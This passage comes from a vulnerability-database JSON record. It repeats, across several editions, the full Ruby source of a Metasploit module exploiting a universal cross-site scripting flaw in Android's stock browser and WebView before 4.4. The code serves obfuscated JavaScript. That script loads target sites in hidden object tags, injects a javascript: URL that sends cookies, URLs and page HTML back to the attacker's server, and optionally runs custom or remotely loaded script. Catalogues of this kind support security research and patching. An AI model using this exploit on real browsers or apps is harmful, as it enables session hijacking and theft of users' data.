'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-22T22:39:08", "differentElements": ["modified", "published"], "edition": 33}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-23T12:36:53", "history": [], "viewCount": 55, "enchantments": {"score": null}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-23T12:36:53", "differentElements": ["modified", "published"], "edition": 34}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-23T14:38:22", "history": [], "viewCount": 55, "enchantments": {"score": null}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-23T14:38:22", "differentElements": ["modified", "published"], "edition": 35}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-24T02:53:34", "history": [], "viewCount": 55, "enchantments": {"score": null}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-24T02:53:34", "differentElements": ["modified", "published"], "edition": 36}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-24T08:49:18", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-24T08:49:18", "differentElements": ["modified", "published"], "edition": 37}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-26T22:46:02", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-26T22:46:02", "differentElements": ["modified", "published"], "edition": 38}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-27T00:43:53", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
